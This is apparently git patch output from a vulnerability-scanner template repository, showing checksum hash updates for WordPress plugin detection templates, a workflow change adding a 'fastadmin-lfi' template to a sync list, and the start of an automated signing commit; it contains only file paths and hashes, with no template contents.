+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:05ee8ed37ceadca94ff66df14cee10c8b52d24d1 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:313c79f7e0e8f362ab5433d6c721ac73d0cf44fa -http/technologies/wordpress/plugins/mailpoet.yaml:77204b61a8a8f54a1b23f9407f43de4382d99ab1 -http/technologies/wordpress/plugins/maintenance.yaml:ccffa8d0871f5816ff8db4d1a959715287f3ac30 -http/technologies/wordpress/plugins/mainwp-child.yaml:53bc2115d4bab847d6fce21fa743b6fecaaa3059 -http/technologies/wordpress/plugins/malcare-security.yaml:add3736084b60ef7597f55f53512bc8221980321 -http/technologies/wordpress/plugins/megamenu.yaml:8529ad23f49363a7661d3da8c0568885843bcee6 -http/technologies/wordpress/plugins/members.yaml:8b51c0fa00650de28c88e870d1851f6e9cdef39d -http/technologies/wordpress/plugins/meta-box.yaml:f6781cc6657aeaa3fdf6e4bc2cd1f2647cead027 -http/technologies/wordpress/plugins/metform.yaml:46475fe67f8a574aea7dd48f6f9ea99bd1f880be -http/technologies/wordpress/plugins/ml-slider.yaml:fd5451c7273298d457cb63a5520a852fcad65e98 -http/technologies/wordpress/plugins/newsletter.yaml:e4bf7923f0399e3445a0e66db0661abd126ba086 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8419f931966aeeec0a2654381b5f5e6c78ece749 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:bad2667a6169389f5d1929b633a064520b5fef83 -http/technologies/wordpress/plugins/ninja-forms.yaml:d3efaddc0299928c6eff466fb3e39e5625049c7d -http/technologies/wordpress/plugins/ocean-extra.yaml:4d6a98ba8eadef3545c52ca0090778407db7a96e -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:dd2d97d05fbf75167b48e931c81d4ac4bd8dcda8 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:6391170313f2e41f2d3e592feaf9316cd46dfbef -http/technologies/wordpress/plugins/optinmonster.yaml:6ff8ddf6e245287b49b1c96f26cf9af2b7e1835b -http/technologies/wordpress/plugins/otter-blocks.yaml:732354dc8855ba9e74de9ee8bfed83039c18ba58 -http/technologies/wordpress/plugins/password-protected.yaml:63d91e0d7e457a6f5de281277554577e915547bd -http/technologies/wordpress/plugins/pdf-embedder.yaml:ad606d12b8afb875a0088bac31115d0688c12d66 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e +http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e +http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:60c36e273a7f20fc3aee1786d40f73640f24a325 -http/technologies/wordpress/plugins/pixelyoursite.yaml:ce2a0c0fb077c68ed37657f913eecd79bef0c3c6 -http/technologies/wordpress/plugins/polylang.yaml:15c4f4eea4b33d829da980bd07d7f44e61da74a4 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:df03adf66a0258b5ea7c2dcfa8fcace891c5755e -http/technologies/wordpress/plugins/post-smtp.yaml:aadc8d632b6d59e8a3d3673b0e3b0cf61850f503 -http/technologies/wordpress/plugins/post-types-order.yaml:d1e1c3cd67b1e315814c180e5e7f2860fce2aa52 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:19b1954a3969722e0e13231275237f37c2ebbd1a -http/technologies/wordpress/plugins/pretty-link.yaml:f9f9edd15c9de3420031dcb0eccecac8073809ce -http/technologies/wordpress/plugins/really-simple-captcha.yaml:5b0db99d052651b70c406f12f797c9310d058928 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:ebda27af0811ea80e3c4fee294959c2096e835cc -http/technologies/wordpress/plugins/redirection.yaml:62196b58a7219a5ba15908eac23070569939f9d8 -http/technologies/wordpress/plugins/redux-framework.yaml:b38088854e37530d56be3e573ab35d74ae7a00e2 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:adb28f8b872294c20d557257cac5d8cb6a951b09 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:20db878c50ec9a33d53e44c7dfd60b03f967bdd5 -http/technologies/wordpress/plugins/safe-svg.yaml:25035832d830765564a3ccc56114d1a1eaa15e39 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:e38b531d39c1775b18c114941f758ff7e8274cf2 -http/technologies/wordpress/plugins/sg-cachepress.yaml:4f6557447181f12dfa4168c60776231743fbd31a -http/technologies/wordpress/plugins/sg-security.yaml:e2dd2c42814ef3c35937fee2433f772ba866857b -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:9c268217f1279303fa6a7f91beef5f32cb29326d -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:ef99f6136262d4a9a5827d1c09bff75ed196eaa9 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:68af0493c05981c232cb24ca5d1ea4c3f4f57b65 -http/technologies/wordpress/plugins/simple-history.yaml:f16941eb525ba680f2e0d25cc953e3065ac277a7 +http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 +http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 +http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 +http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:91a6c90459f13ebf894b06ce59d5e3504a09e8dd -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cd3c8e162eafe3ee17a5f360747a3db7fa1023b0 -http/technologies/wordpress/plugins/smart-slider-3.yaml:70907bbc5e294b97c3c83720647943ade6e7fb49 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:5cf1976a4f9558993a3d52abd3d4db127e181e58 +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:5e9df7d3ae102f3666a072fc506fdaf4d97d61e3 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:36b37389569a049515789ef5e39a77d879d780b1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:9db34094f73e51d5e50201519d6b56a3792fce7d -http/technologies/wordpress/plugins/svg-support.yaml:970b308fc2ffebd1b6a85fed45d50e214eff3555 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:2cc13126225bd94123c023c752b9be9c8dacdac4 -http/technologies/wordpress/plugins/tablepress.yaml:f61492167ba912f3adb92c67beee5edc8f31d356 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b6185c6d25be668ccf874f0ebd656ef6fa1d2629 -http/technologies/wordpress/plugins/templately.yaml:3e41caede4c5a76f092d016c6d22e9a0b19e23e7 -http/technologies/wordpress/plugins/the-events-calendar.yaml:01e562cbf58d77f6d81d318c83ce8737e40d8233 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:aefb6f0f89e8d56a13dcee3d9b575761f036eee5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a3797a4180e5d161d84f1449ca3b46b37bcbe6e6 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:ca0ce5bf2c2613dfd55bda218938305a686d71b7 -http/technologies/wordpress/plugins/under-construction-page.yaml:3dbd88ad90b1f0d6902661691fccf9810dbab5a1 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:c18db723278fb99316821b9ade5d5d91a4bc783d +http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:989adba2e4dde4e9239e72a5c007e7310604b51a +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:d1bcce5859d07d3d6611341ba88432d8669276ad -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b7a02ca357dd4f3af730aa152749f94262786082 -http/technologies/wordpress/plugins/webp-express.yaml:96fb2779bbbb0ebdd1a3ed27d2c1b3cced36eebc -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:1762aae249403173a168b0be31f61fdf28e35157 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:b6c736fdd1511d1856039ab3203f177e380c5d21 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c69f3ac4aafaed3333de562856cf11bf5bda097a -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:51e72b5b7dedf8f21a5245b0884b93806db974f2 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:172408b3e5d45e51d8cc279b901d4ae16c517809 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:b57da79faf5ee13415c55f6ff542ee85573dd036 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:482f58b607236a4678d8cd219339f7b8873bd5c2 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:78652be29ebe090e2f3ab8088bff268d38402a2b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:a2c8bddfca83c004f7b3491c75ed4b7699ad005d -http/technologies/wordpress/plugins/woocommerce-services.yaml:029c7448578ea6daea0b23f8416627ea575f6a78 -http/technologies/wordpress/plugins/woocommerce.yaml:a585ff3c24472097b1cc770bb06177f15e1bb240 -http/technologies/wordpress/plugins/wordfence.yaml:eb5fb241b54cf2ffd270a176b42d3b0714f59d54 -http/technologies/wordpress/plugins/wordpress-importer.yaml:2d3d76e3df891985ec78f4524ef0684dcbd00cd8 -http/technologies/wordpress/plugins/wordpress-seo.yaml:a3808a512cd2cc9e6d620c9e18f25498339983ba +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:2e63918b99177134d764b6f77b0aaed3569e3e60 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:32b185cb3628223d0fa026b700d14d0f17abcd09 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ce79f708a701ef15382ea87a5b5ad8ca949753bd -http/technologies/wordpress/plugins/wp-google-maps.yaml:e5f53bb3663c9789a123ea9d0db3520f21bec878 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:b663be5227e76924444ab19b9cdf80e3dc8f2026 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:db3c2040e707d38b65adb5b27d29f49af354f4ad -http/technologies/wordpress/plugins/wp-migrate-db.yaml:80c3863637b1bdc610df7df523ac8547ee650eb9 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:48cb74ac3cc5eb5f8253485bd1710d1a80a31be8 -http/technologies/wordpress/plugins/wp-optimize.yaml:12cf7b400ef85581e2e6b2d6f587c163288bb07e -http/technologies/wordpress/plugins/wp-pagenavi.yaml:a51ebfe71c01c0601d410d1a86190c9aab27fa02 -http/technologies/wordpress/plugins/wp-reset.yaml:dc51aa0045a3821412ec8a7c6d2342d1b166af40 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f6473d6332703726ea217f9133a3c45a1039e3a4 -http/technologies/wordpress/plugins/wp-rollback.yaml:5f9d2aa7b1880abc38a705f1b35de3f35e7d2248 -http/technologies/wordpress/plugins/wp-seopress.yaml:9a9763f016164dbc51d6fcc2e110c8b9dcb7f3d0 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:dc76a3fea22b2a6bb34f8745c6405081c554397b -http/technologies/wordpress/plugins/wp-smushit.yaml:f1002bd613a6872989f419af97049d6cc4644675 -http/technologies/wordpress/plugins/wp-statistics.yaml:cf28b9f684a0fa1a7937c6ab825e9c37af25dd3f -http/technologies/wordpress/plugins/wp-super-cache.yaml:186e5dbf697d5c357727b47f7de4f031c704568c +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 +http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:ef68a5ff6058130b28757cab22c62add2f40e8ac -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:908c7abc2b8386528c8e7011090de05f4de329dd -http/technologies/wordpress/plugins/wpforms-lite.yaml:c76d3b5344fc4902127ba97d3e6e6ce4d6bd753c -http/technologies/wordpress/plugins/wps-hide-login.yaml:acfb1e72d0b4b6ea9ce72a941e3f4a42c0dab055 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:9af0a635143381ca9b03c03651f485981da14942 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:10c83a981ebaf9458df805b8236d8e5d8a8f0fea +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7919,6 +7919,7 @@ http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:aa21740a09946f84680 http/vulnerabilities/other/eyelock-nano-lfd.yaml:4d7585f47be6a4c23b09cafc420ab8e6583b7614 http/vulnerabilities/other/f-secure-policymanager-log4j-rce.yaml:37163a2939ac4cd8ee348d98fec332ccdf9f22c7 http/vulnerabilities/other/fanruanoa2012-disclosure.yaml:7de55d9312193322c47da705fc415993a17b6b9f +http/vulnerabilities/other/fastadmin-lfi.yaml:7644d1d963191941670db93c777479434dd1d851 http/vulnerabilities/other/fatpipe-auth-bypass.yaml:f4d35fbb62d240efc6740aaa825a7bc0df8b20f3 http/vulnerabilities/other/feifeicms-lfr.yaml:fc9d3c9329a5a481964cfc31f0e7f3e7e1589ef4 http/vulnerabilities/other/finecms-sqli.yaml:2999c4ff5d5ff94783eb74a73689df83303ed7d1 @@ -8758,7 +8759,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:73fa7679b346f135e75b7be73ae6e8d63f396ba8 +templates-checksum.txt:c9834d9925a5f118645eec27069d40096bcd49d6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From dd93dff411e87aef07d094219ce477600f89c0de Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 05:26:11 +0000 Subject: [PATCH 0517/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fe5436fde9..5812e0d6b7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -125,6 +125,7 @@ on: - 'http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml' - 'http/vulnerabilities/gradio/gradio-lfi.yaml' - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' + - 'http/vulnerabilities/other/fastadmin-lfi.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: jobs: From 00404d58f2cc4ca8387f86e958584916c21a999f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 05:27:17 +0000 Subject: [PATCH 0518/1841] Auto Template Signing [Mon Jun 24 05:27:17 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + 